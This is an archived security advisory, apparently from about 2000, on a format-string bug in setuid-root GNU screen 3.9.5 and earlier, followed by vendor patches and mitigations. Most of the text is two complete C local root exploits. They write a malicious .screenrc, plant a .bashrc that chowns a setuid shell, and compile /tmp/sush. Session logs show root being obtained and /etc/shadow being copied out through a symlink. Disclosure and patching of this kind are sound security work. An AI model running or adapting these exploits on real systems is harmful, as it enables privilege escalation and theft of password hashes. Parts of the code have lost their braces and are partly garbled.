

    screen 3.9.5 and earlier


    Jouko Pynninen  found following.   A vulnerability  exists in  the
    program  "screen"  version  3.9.5  and  earlier.   If  screen   is
    installed  setuid  root,  a  local  user  may gain root privilege.
    There are  many systems  where the  program isn't  setuid root  by
    default, but on many systems (at least SuSE Linux, Red Hat 5.2 and
    earlier, *BSD ports packages, Solaris, other commercial unices) it
    is, making them vulnerable.

    To quickly  check if  your version  is vulnerable,  have these two
    lines in ~/.screenrc:

        vbell on
        vbell_msg '%x'

    Set TERM to vt100, start screen and press ctrl-G (you may need  to
    issue the command echo ^V^G to get  a visual bell).  If you see  a
    hexadecimal number  on the  last line,  your version  of screen is
    vulnerable.  However it can't  be exploited unless the program  is
    installed setuid root.

    The bug is located in screen.c in function serv_select_fn():

                      else if (visual && !D_VB && (!D_status || !D_status_bell))
                          D_status_delayed = -1;
                          Msg(0, VisualBellString);
                          if (D_status)

    Msg()  feeds   the  second   argument  to   sprintf()  and   since
    VisualBellString is  user defineable,  we have  a classical format
    bug.  From  there, a malicious  user can either  do the old  trick
    and write over a return  address in stack, or for  instance, write
    over the real_uid variable where screen saves the user id.   After
    zeroing this  variable with  the format  string the  user can just
    open a new window with a root shell in it.

    For this reason  the bug is  quite platform-independent; no  shell
    code nor executable stack is  needed.  The vulnerability has  been
    tested on Linux, Intel and ppc architectures.

    Vulnerable are found to be  NetBSD, FreeBSD, OpenBSD (screen is  a
    part of the ports collection) Red Hat Linux 5.2 and earlier,  SuSE
    Linux, Solaris, many commercial unices.

    It seems that the  invoked bash crashes if  we set real_uid to  0,
    so lets try another way: create a .bashrc which does the work.  On
    Suse  6.1  and  screen  3.7.6  the  crash  occurs after .bashrc is
    executed so we can exploit this.

        paul@phoenix:/tmp > id
        uid=500(paul) gid=100(users) groups=100(users)

        paul@phoenix:/tmp > ls -la
        total 9
        drwxrwxrwt   4 root     root         1024 Sep  6 17:41 .
        drwxr-xr-x  18 root     root         1024 Mar  7  2000 ..
        drwxrwxrwt   2 root     root         1024 Feb 15  2000 .X11-unix
        -rwxr--r--   1 paul     users        4559 Sep  6 17:41 expl.c
        drwxr-xr-x   4 root     users        1024 Sep 14  1999 screens

        paul@phoenix:/tmp > gcc expl.c (padding set to 1)
        paul@phoenix:/tmp > a.out 63
        Screen 3.7.6+ local r00t exploit
        by IhaQueR@IRCnet

        creating magic string
        building /home/paul/.screenrc
        creating /home/paul/.bashrc
        compiling suid shell
        press enter to start screen, then hit enter again, ctrl-g, ctrl-c for
        suid shell
         at /tmp/sush

        Screen version 3.07.06 (FAU) 25-Nov-98

        Copyright (c) 1993-1998 <blah....>

        chown: /tmp/sush: Operation not
        permitted                                      =F3
         > l@phoenix:/tmp/PPP=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=B5

        <ctrl-g> status:

        <ctrl-a ctrl-c>

         > idphoenix:/tmp/P=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=B5
        uid=0(root) gid=100(users) groups=100(users)
         > t@phoenix:/tmp/P=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=F3=B5

        hm :-> this time without crash...

        paul@phoenix:/tmp > ls -l
        total 79
        drwxr-xr-x   2 paul     users        1024 Sep  6 17:52
        -rwxr-xr-x   1 paul     users       36313 Sep  6 17:49 a.out
        -rwxr--r--   1 paul     users        4355 Sep  6 17:48 expl.c
        drwxr-xr-x   4 root     users        1024 Sep 14  1999 screens
        -rwsr-xr-x   1 root     root        33190 Sep  6 17:49 sush
        -rw-r--r--   1 paul     users          71 Sep  6 17:52 sush.c

    But  whatever,  we  have  a  suid  shell at /tmp/sush even if bash

    *                                                               *
    *  Screen 3.7.6 (and others) local exploit                      *
    *  by IhaQueR@IRCnet                                            *
    *  only for demonstrative purposes                              *
    *                                                               *

    #include <stdio.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <string.h>
    #include <sys/utsname.h>
    #include <pwd.h>

    #define TMPBUFSIZE 1024

    #define SCREENRC ".screenrc"
    #define BASHRC ".bashrc"
    #define SCREEN "/usr/bin/screen"

    /* to help you hit the buffer we repeat the addr in the dir path */
    #define AREP 16

    /* but write only once */
    #define WREP 1

    /* offset of the buffer seen from Msg() */
    #define BUFOFFSET 284
    #define PADDING 0

    /* addr to be written */
    #define WRITEADDR 0x807beb4

    /* some offsets grabbed from 3.7.6 on S.u.S.E 6.1
      &real_uid, &real_gid, &eff_uid, &eff_gid own_uid
      0x807beb4 0x807ab1c 0x807aab0 0x807aab4 0x807bea4
      + 64  +64   ?   ?   ?

    to get usefull offsets try this:

    ------------------- insert into screen.c source ----------------------
    char mybuf[100000];
    int jj;

    void dumpstack(int err, char* fmt, ...)
    static va_list ap;
    char buf[100000];
    char *p = buf;
    FILE * fp;

    #define STACKDMP "/tmp/stackdmp"

      va_start(ap, fmt);
      (void) vsnprintf(buf, sizeof(buf) - 100, fmt, ap);
     if(fp = fopen(STACKDMP, "w")) {
      fprintf(fp, "%s", buf);


    then find in screen.c the line: 'Msg(0, VisualBellString);' and replace
    it with

       bzero(mybuf, 100000);
       for (jj=0; jj<1500; jj++)
        strcat(mybuf, "%x ");
       dumpstack(0, mybuf);

    compile screen, run, hit ctrl-g and look at the stack in
    of course you can dump the adresses of &real_uid, &real_gid too
    (maybe you would need a small offset for a.out)


    int main(int argc, char** argv)
    int i, off=0;
    int writeoffs, bufoffset;
    unsigned a, *p;
    FILE* fp;
    unsigned char* cp;

    char buf[TMPBUFSIZE];
    unsigned char adr[(AREP+2)*sizeof(unsigned)];
    char screenrc[TMPBUFSIZE];
    char bashrc[TMPBUFSIZE];

    struct utsname uts;
    struct passwd* pwd;

      if(argc != 2) {
       printf("USAGE %s offset\n", argv[0]);
       return 0;
      } else {
       printf("Screen 3.7.6+ local r00t exploit\n");
       printf("by IhaQueR@IRCnet\n\n");

    /* calc addr offset  */
      getcwd(buf, TMPBUFSIZE);
      off += strlen(buf);
      off += strlen(uts.nodename);
      pwd = getpwuid(getuid());
      off += strlen(pwd->pw_name);

    /* user@host:/cwd/ @:/ */
      off += 3;
      bufoffset = BUFOFFSET + off;

      strcpy(screenrc, pwd->pw_dir);
      strcat(screenrc, "/");
      strcat(screenrc, SCREENRC);

      strcpy(bashrc, pwd->pw_dir);
      strcat(bashrc, "/");
      strcat(bashrc, BASHRC);

    /* user supplied offsets */
      writeoffs = atoi(argv[1]);
      printf("creating magic string\n");
      bzero(buf, TMPBUFSIZE);

    /*  consume stack arguments */
      for(i=0; i<bufoffset/4; i++)
       strcat(buf, "%.0d");

    /*  finally write to adress */
      for(i=0;i<WREP; i++)
       strcat(buf, "%n");

    /* create screenrc */
      printf("building %s\n", screenrc);
      if(fp = fopen(screenrc, "w")) {
       fprintf(fp, "vbell on\n");
       fprintf(fp, "vbell_msg '%s'\n", buf);
       fprintf(fp, "vbellwait 3600\n");
      else {
       printf("ERROR: opening %s\n", screenrc);
       return 1;

    /*  create bashrc  */
      printf("creating %s\n", bashrc);
      snprintf(buf, TMPBUFSIZE, "cp %s %s.orig", bashrc, bashrc);
      snprintf(buf, TMPBUFSIZE, "echo >%s 'chown root:root /tmp/sush; chmod
    4755 /tmp/sush'", bashrc);

    /*  create suid shell */
      printf("compiling suid shell\n");
      snprintf(buf, TMPBUFSIZE, "echo >/tmp/sush.c 'main(int ac, char**
    av){setuid(0); setgid(0); execv(\"/bin/bash\", av);}'");
      system("gcc /tmp/sush.c -o /tmp/sush");

    /*  now create the magic dir... */
      bzero(adr, (AREP+2)*sizeof(unsigned));
      cp = adr;
      for(i=0; i<PADDING; i++) {
       *cp = 'P';

      p = (unsigned*) cp;
      a = WRITEADDR + writeoffs;

      for(i=0; i<AREP; i++) {
       *p = a;

      *p = 0;

    /* make dir and call screen */
      mkdir((char*)adr, 0xfff);
      argv[1] = NULL;
      printf("press enter to start screen, then hit enter again, ctrl-g,
    ctrl-c for suid shell at /tmp/sush");
      execv(SCREEN, argv);

    Paul Starzetz  added following.   As mentioned  in other  postings
    the  screen  package  is  vulnerbale  to the classic format string
    attack.   Below  is  a  simple  exploit  and  as far as Paul could
    investigate on Suse 6.1 with screen 3.7.6 the vulnerable  function
    is Msg(int err,  char *fmt, ...)  which is invoked  with the value
    of the vbell_msg from .screenrc.  Unfortunatelly the format string
    is never copied onto stack, so  he looked for the contents of  the
    stack before calling Msg(0, VisualBellString).  It seems that  the
    'buf' variable  in main()  contains the  current working directory
    from  which  we  called  screen  (get  screen  source, compile and
    replace  Msg(0,  VisualBellString)  with  a  small  stack  dumping
    function...).  So all we  need is to mkdir a  directory containing
    the write address, consume some  arguments from the stack and  let
    screen  overwrite  the  real_uid  variable  and  then create a new
    shell with our uid.

    So lets  look at  the stack  inside Msg(...)  after calling screen
    from a directory containing "ABCDEFGHIJ...":

        4000bc74 1 8049e90 0 0 0 0 0 0 0 0 0 0 0 80995a8 0 0 bfffe4b8 ffffffff 0
        bffff942 7ff 0 bffff942 0 0 0 0 0 0 0 ffffffff 0 0 0 0 ffffffff ffffffff
        ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff
        0 0 301 0 0 2fb2 41c0 2 1f4 64 0 0 0 400 1000 2 39b572f1 0 39b5a058 0
        39b5a058 0 0 0 75610700 6870406c 696e656f 752f3a78 682f7273 2f656d6f
        6c756170 706d742f 63732f32 70786572 4342412f 47464544 4b4a4948 4f4e4d4c
        53525150 57565554 5c5a5958 5d5c5c5b 605f5e5c 64636261 660d6665 6a696867
        6e6d6c6b 7271706f

    4342412f is it (prefixed by  parent dir), the padding seems  to be
    3 for my constelation...  So we try it now with padding set to  3,
    buffer offset 324 and uidaddr 0x807beb4:

        gcc expl.c
        a.out 0
        <screen comes up> <enter> <ctrl-g> <status line shows strange chars like
        <ctrl-a> <ctrl-c>
        uid=500(paul) gid=100(users) groups=100(users)

   Hm...lets kill it.  Try now:

        a.out 64
        shell-init: could not get current directory: getcwd: cannot access
        parent direct
        ories: Permission denied
        bash: /home/paul/.bashrc: Permission denied
        I have no name!@phoenix:/usr/home/paul/tmp2/screxp > id
        uid=255 gid=100(users) groups=100(users)

    W00w, we hit the uid seems, 255 is the number of chars written  by
    vsnprintf.  It looks like:

        OFF        64    65    66    67
        UID        f4    01    00    00
        %n         ff    00    00    00

    Why not shift it by 1 to the left?

        a.out 63
        <same> after <ctrl-c>:
        [screen caught signal 11.]
        paul@phoenix:/usr/home/paul/tmp2/screxp >

    Bad, but  we can  still grab  /etc/shadow (any  idea to avoid this
    damn sighandler?):

        a.out 63
        <screen comes up> <enter> <ctrl-g> <staus line with strange output> but
        try now:

        paul@phoenix:~/tmp2/screen-3.7.6 > ln -s /etc/shadow /tmp/screen-xchg

        <ctrl-a ctrl-< >   status says: Slurped 1142 characters into buffer,
        very nice....

        paul@phoenix:~/tmp2/screen-3.7.6 > rm /tmp/screen-xchg
        paul@phoenix:~/tmp2/screen-3.7.6 > touch /tmp/screen-xchg

        and again ctrl a ctrl > Copybuffer written to "/tmp/screen-xchg".

        paul@phoenix:~/tmp2/screen-3.7.6 > ls -l /tmp
        total 10
        -rw-r--r--   1 paul     users        1142 Sep  6 08:16 screen-xchg

        paul@phoenix:~/tmp2/screen-3.7.6 > cat /tmp/screen-xchg

    Oh no  it works.....   Note that  you can  get uid  bin (1) if you
    replace  the  'strcat(buf,  "%.0d");'  with  'strcat(buf, "%.d");'
    because vsprintf writes  then 256+ characters.   With so  modified
    version of expl.c:

        paul@phoenix:/usr/home/paul/tmp2/screxp > gcc expl.c
        paul@phoenix:/usr/home/paul/tmp2/screxp > a.out 63
        <screen welcome> <enter> <ctrl-g> <ctrl-c>
        shell-init: could not get current directory: getcwd: cannot access
        parent direct
        ories: Permission denied
        bash: /home/paul/.bashrc: Permission denied
        bin@phoenix:/usr/home/paul/tmp2/screxp > id
        uid=1(bin) gid=100(users) groups=100(users)
        bin@phoenix:/usr/home/paul/tmp2/screxp >

    now create a suid bin shell.......

    Paul has also a working but unstable root exploit and he  wondered
    why it works because it theoretically shouldn't work...

        paul@phoenix:/usr/home/paul/tmp2/screxp > gcc screxpl.c
        paul@phoenix:/usr/home/paul/tmp2/screxp > a.out 63

        <screen ...> <ctrl-g> <ctrl-c>
        =F3\[=F3\[=F3\[ # idome/paul/tmp2/screxp/ppp=F3\[=F3\[=F3\[=F3\[=F3\[=AB
        uid=0(root) gid=100(users) groups=100(users)
        =F3\[=F3\[=F3\[ # cp /bin/bash .2/screxp/ppp=F3\[=F3\[=F3\[=F3\[=F3\[=AB
        =F3\[=F3\[=F3\[ # chmod u+s bash2/screxp/ppp=F3\[=F3\[=F3\[=F3\[=F3\[=AB
        =F3\[=F3\[=F3\[ # ls -l/paul/tmp2/screxp/ppp=F3\[=F3\[=F3\[=F3\[=F3\[=AB
        total 481
        dr-xr--r-x   2 paul     users        1024 Sep  6 08:33 .
        drwxr-xr-x  18 paul     users       12288 Sep  6 08:32 ..
        -rwsr-xr-x   1 root     users      475348 Sep  6 08:33 bash

    Sorry the term got confused.  So now we have a suid root bash....

    *  Screen 3.7.6 (and others) local exploit
    *  by IhaQueR@IRCnet

    #include <stdio.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <string.h>

    #define TMPBUFSIZE 4096

    #define SCREENRC "/usr/home/paul/.screenrc"
    #define SCREEN "/usr/bin/screen"

    #define AREP 1
    #define BUFOFFSET 324
    #define PADDING 3
    #define WRITEADDR 0x807beb4

    //  some offsets grabbed from 3.7.6
    //  &real_uid, &real_gid, &eff_uid, &eff_gid own_uid
    //  0x807beb4 0x807ab1c 0x807aab0 0x807aab4 0x807bea4
    //  + 64  +64

    int main(int argc, char** argv)
    int i, l;
    FILE* fp;
    char buf[TMPBUFSIZE];
    unsigned char adr[(AREP+2)*sizeof(unsigned)];
    unsigned char* cp;
    unsigned a, *p;

      if(argc != 2) {
       printf("USAGE %s offset\n", argv[0]);
       return 0;

      l = atoi(argv[1]);
      printf("creating magic string\n");

      bzero(buf, TMPBUFSIZE);

    /*  consume stack arguments */
      for(i=0; i<BUFOFFSET/4; i++)
       strcat(buf, "%.0d");

    /*  finally write to adress */
    //  for(i=0;i<9; i++)
       strcat(buf, "%n");

      if(fp = fopen(SCREENRC, "w")) {
       fprintf(fp, "vbell on\n");
       fprintf(fp, "vbell_msg '%s'\n", buf);
       fprintf(fp, "vbellwait 11111\n");
      else {
       printf("ERROR: opening %s\n", SCREENRC);

    /*  now create the magic dir... */
      bzero(adr, (AREP+2)*sizeof(unsigned));
      cp = adr;
      for(i=0; i<PADDING; i++) {
       *cp = 'p';

      p = (unsigned*) cp;

      a = WRITEADDR;
      a = a + l;

      for(i=0; i<AREP; i++) {
       *p = a;
    //   a += 4;

      *p = 0;

    /* make dir and call screen */
      mkdir((char*)adr, 0x777);
      argv[1] = NULL;
      execv(SCREEN, argv);


    Red Hat Linux 6.0 and later and most other Linux distributions are
    not vulnerable.  Removing the setuid bit from the binary makes  it
    impossible to be exploited:

        chmod 111 /usr/local/bin/screen        # or /usr/bin/screen

    BUT this may require some  changes to the mode of  screen's socket
    dir  (usually  /tmp/screens).   Consult  screen  documentation for
    more info.  Since screen in Red Hat Linux 5.2 and earlier releases
    was setuid root, this security  hole could be exploited to  gain a
    root shell.  So, for RedHat:

    Screen authors (and some OS vendors) have been informed and a  new
    version of screen can be retrieved from

    and diffs relative to version 3.9.5:

    Vendor patches for vulnerable systems have been released, or  will
    be released.

    FreeBSD  port  not  affected  for  this  problem after 1 sept 2000
    because it contains security patch for this problem.

    $ cat /usr/ports/misc/screen/patches/patch-sec1
    --- screen.c.orig       Fri Sep  1 17:58:35 2000
    +++ screen.c    Fri Sep  1 17:57:35 2000
    @@ -2311,7 +2311,7 @@
                  else if (visual && !D_VB && (!D_status || !D_status_bell))
                      D_status_delayed = -1;
    -                 Msg(0, VisualBellString);
    +                 Msg(0, "%s", VisualBellString);
                      if (D_status)
                          D_status_bell = 1;

    Patch for FreeBSD:

    Linux-Mandrake does not ship  screen setuid root and  is therefore
    not vulnerable to this problem.

    Fix applied  to NetBSD  pkgsrc on  1st september.   NetBSD  pkgsrc
    users  should  confirm  they  have  screen-3.9.5nb1 or later.  For
    reference, patch applied:

    $NetBSD: patch-ah,v 1.2 2000/09/01 15:23:51 kim Exp $

    --- screen.c.orig	Wed Sep  1 17:57:25 1999
    +++ screen.c	Fri Sep  1 11:22:45 2000
    @@ -2311,7 +2311,7 @@
 	          else if (visual && !D_VB && (!D_status || !D_status_bell))
 		      D_status_delayed = -1;
    -		  Msg(0, VisualBellString);
    +		  Msg(0, "%s", VisualBellString);
 		      if (D_status)
 		          D_status_bell = 1;

    Conectiva Linux  does not  ship screen  SUID and  is therefore not

    For SuSE Linux: